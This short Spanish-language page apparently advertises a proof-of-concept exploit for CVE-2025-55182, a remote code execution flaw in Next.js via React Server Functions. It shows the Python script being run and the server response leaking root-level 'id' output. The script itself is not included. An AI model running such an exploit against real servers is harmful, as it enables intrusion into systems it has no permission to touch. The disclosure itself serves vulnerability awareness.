
Prueba de concepto del exploit para CVE-2025-55182 que permite la ejecución remota de código en Next.js a través de React Server Functions. Incluye un script en Python que demuestra la inyección de comandos y devuelve la salida a nivel de sistema.
Next.js RCE a través de React Server Functions
❯ python3 cve-2025-55182-exploit.py
0:{"a":"$@1","f":"","b":"3OmR5Ifk9dmFJ1coB7-Wc"}
1:E{"digest":"uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)"}